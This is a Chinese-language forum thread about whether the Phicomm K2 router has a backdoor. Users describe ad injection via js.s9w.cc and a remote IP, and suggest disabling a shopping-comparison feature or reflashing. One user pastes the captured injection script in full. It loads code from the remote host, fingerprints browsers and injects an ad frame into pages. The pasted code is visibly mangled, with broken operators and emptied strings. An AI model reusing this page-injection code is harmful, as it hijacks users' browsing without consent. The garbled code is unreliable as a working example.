請問各位,斐訊k2路由器真的有後門嗎?
請問下,我昨天剛在京東以379的價格下單了K2路由器5台。聽說不少人說這款路由器有後門 會上傳用戶的個人信息,我想問一下,有沒有人真實發現了這個問題,或者真的在使用後出現了實際的泄漏?謝謝!!!
用了0元購的斐訊K2路由器之後,會發現很多時候瀏覽器訪問網頁的時候多了 http://js.s9w.cc的 js ,這是明顯的劫持,網上說是斐訊K2後門在惡意注入。經真的值得買小編測試後發現,登錄路由器後台,192.168.2.1,關掉「系統設置」---》「應用設置」里的「購物比價」功能即可解決這問題。
不放心的朋友還是自行刷機吧,可是別人修改的固件你又放心嗎?當然,我們可以刷華碩路由器的官方rom。
瀏覽器里出現js.s9w.cc的js是個什麼鬼?原來是斐訊k2路由器 的購物比價功能在搗蛋
本人已經入坑,確定了至少有廣告後門。
半年前jd上花399元買的斐訊K2,不知道0元購機,也不知道啥叫K碼。買來就閑置了一段時間,最近用上了後,發現有些根本不可能會有廣告的網站,竟然彈出廣告了。第一反應就是路由器出問題了,對比了訪問頁面的中廣告和沒中廣告的源碼,發現多了這麼一段
&&
蛋疼。
訪問頁面http://222.73.156.145/587?MAC=747D240CC8C0 看看:
(function () {
var ip = "http://222.73.156.145";
var pc = false;
var android = true;
var ios = true;
// 以下是需要手動替換的變數
var ad_customer = "587";
var mid = "561";
var deviceMac = "74:7D:24:0C:C8:C0";
loadExternResource({
scripts: [{tag: "script", url: ip + "/material/common/js/jquery-1.11.2.min.js"}],
callBack: function () {
//需要等待dom body load完成的時候再去載入
$(function(){
//console.log(document.readyState);
aa();
})
}
});
function loadExternResource(obj) {
var elem, links, scripts, callBack, hasReadyState;
var head = document.getElementsByTagName("head")[0];
var ObjOrg = {links: null, scripts: null, callBack: null};
for (var prop in obj) {
ObjOrg[prop] = obj[prop];
}
links = ObjOrg.links;
scripts = ObjOrg.scripts;
callBack = ObjOrg.callBack;
if (links != undefined) {
for (var i in links) {
elem = document.createElement("link");
elem.rel = "stylesheet";
elem.href = links[i].url;
head.appendChild(elem);
}
}
if (scripts != undefined) {
var load, loadHandle, loadCallBack;
elem = document.createElement("script");
elem.type = "text/javascript";
if (callBack != undefined) {
hasReadyState = (elem.readyState != undefined);
loadCallBack = function (index) {
scripts[index].loadState = true;
for (var j in scripts) {
if (false == scripts[j].loadState) {
return;
}
}
callBack();
};
for (var i in scripts) {
scripts[i].loadState = false;
}
}
for (var i in scripts) {
elem = document.createElement("script");
elem.type = "text/javascript";
if (callBack != undefined) {
if (hasReadyState) {
elem.onreadystatechange = (function (index) {
return function () {
if (this.readyState == "loaded" || this.readyState == "complete") {
this.onreadystatechange = null;
loadCallBack(index);
}
};
})(i);
} else {
elem.onload = (function (index) {
return function () {
loadCallBack(index);
};
})(i);
}
}
elem.src = scripts[i].url;
head.appendChild(elem);
}
}
}
function getPageCharset() {
var charSet = "";
var oType = getBrowser();
switch (oType) {
case "IE":
charSet = document.charset;
break;
case "FIREFOX":
charSet = document.characterSet;
break;
default:
charSet = document.charset;
break;
}
return charSet;
}
function getBrowser() {
var oType = "";
if (navigator.userAgent.indexOf("MSIE") != -1) {
oType = "IE";
} else if (navigator.userAgent.indexOf("Firefox") != -1) {
oType = "FIREFOX";
}
return oType;
}
function aa() {
/* $.get("http://" + ip + "/getIndex/"+ad_customer+"?MAC="+deviceMac, function(data){
ad_customer =data;
alert("material id"+ ad_customer);
});*/
//增加禁止域名判斷
if(forbidHost()){
return false;
}
hostUrl = encodeURIComponent(top.window.location.href);
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appVersion;
return {
trident: u.indexOf("Trident") &> -1, //IE內核
presto: u.indexOf("Presto") &> -1, //opera內核
webKit: u.indexOf("AppleWebKit") &> -1, //蘋果、谷歌內核
gecko: u.indexOf("Gecko") &> -1 u.indexOf("KHTML") == -1, //火狐內核
mobile: !!u.match(/AppleWebKit.*Mobile.*/) || !!u.match(/AppleWebKit/), //是否為移動終端
ios: !!u.match(/(i[^;]+;( U;)? CPU.+Mac OS X/), //ios終端
android: u.indexOf("Android") &> -1 || u.indexOf("Linux") &> -1, //android終端或者uc瀏覽器
iPhone: u.indexOf("iPhone") &> -1 || u.indexOf("Mac") &> -1, //是否為iPhone或者QQHD瀏覽器
iPad: u.indexOf("iPad") &> -1, //是否iPad
webApp: u.indexOf("Safari") == -1 //是否web應該程序,沒有頭部與底部
};
}()
}
if (isWeiXin() || isAPP()) {
} else if (browser.versions.android == true) { //只投Android
if(android){
str_html = "&";
}
} else if (browser.versions.ios == true || browser.versions.iPhone == true || browser.versions.iPad == true) {
if(ios){
str_html = "&";
}
} else if (pc) {
str_html = "&";
} else {
}
$("body", window.top.document).append(str_html);
var str_html;
var docHeight;
docHeight = $(window).height();
if (browser.versions.android == true || browser.versions.android == true || browser.versions.iPhone == true || browser.versions.iPad == true) {
$("#google_ads_frame2").height(docHeight);
}
}
function isWeiXin() {
var ua = window.navigator.userAgent.toLowerCase();
//console.log(ua);//mozilla/5.0 (iphone; cpu iphone os 9_1 like mac os x) applewebkit/601.1.46 (khtml, like gecko)version/9.0 mobile/13b143 safari/601.1
if (ua.match(/MicroMessenger/i) == "micromessenger") {
return true;
} else {
return false;
}
}
function isAPP() {
var ua = window.navigator.userAgent.toLowerCase();
if (ua.indexOf("biliapp") &>= 0) {
return true;
}
if (ua.indexOf("wifikey") &>= 0) {
return true;
}
if (ua.indexOf("newsarticle") &>= 0) {
return true;
}
if (ua.indexOf("peanutwi-fi") &>= 0) {
return true;
}
if (ua.indexOf("phiwifi")&>=0) {
return true;
}
if (ua.indexOf("changba") &>= 0) {
return true;
}
if (ua.indexOf("momowebview") &>= 0 || ua.indexOf("momokit") &>= 0) {
return true;
} else {
return false;
}
}
//禁止顯示廣告的域名,後續增加多個時候可以使用數組
function forbidHost(){
var url = top.window.location.href;
var reg = /phicomm.com/g;
var baiduReg = /m.baidu.com/static/g;
if(reg.test(url) || baiduReg.test(url)){
return true;
}else{
return false;
}
}
})();
然後聯繫客服,第一次聯繫的時候客服要我截圖給證據。由於廣告不是必現的。需要等到廣告出現了才能搜集證據。
==============
最後終於發現了廣告。我雞凍的截圖了,並且把頁面代碼保存了。第二次聯繫客服。這次客服是個女的,把我當做小白,要我排除其他各種可能不是路由器的原因,最後,客服給我郵箱發了一個固件。
啥都不說了,有空就自己玩路由吧,別圖省心。
請放心使用,因為要攻破路由器簡直是小兒科。不去想就沒這麼回事了,攻破你這K2還不如爆高端路由器來的實惠。而且電腦比路由器更危險吧
不管斐訊是否有後門,反正我是閑置了沒有用
因為,我在找其他固件的時候想到,誰能保證網上隨便下的固件沒有後門?不是黑客做的?路由器固件就有問題還有啥秘密可言?
不知道誰能解答
已特么親眼見到;偷偷訪問網址,各種刷流量
難言之隱,一刷了之
我的第一個反應倒不是什麼後門,我主要擔心這東西會不會空閑的時候,把家裡的電拿去挖礦,這個要怎麼判斷?
你使用的系統 誰又能保證沒有後門。你怎麼確定 微軟公司沒有留後門?畢竟Windows 是不開源的。所以,還是不要多想了,網上說有後門就是這路由器做的已經很過分了,比如劫持之類的,而擔心人家 路由器rom 有後門的 就杞人憂天了,敢放出來就不怕你們找。而,斐訊也是敢放出來就
不怕你們知道,明目張胆的後門 我畢竟是0元購啊,不賺錢怎麼搞。
推薦閱讀:
※Xbox 除了用來玩遊戲,還能用來做什麼?
※生物數據為什麼是一種很好的大數據?
※無盤網吧的客戶機可以裝固態硬碟提升讀取速度嗎?
※在擁有正版軟體許可證的情況下,使用該軟體的破解版合法嗎?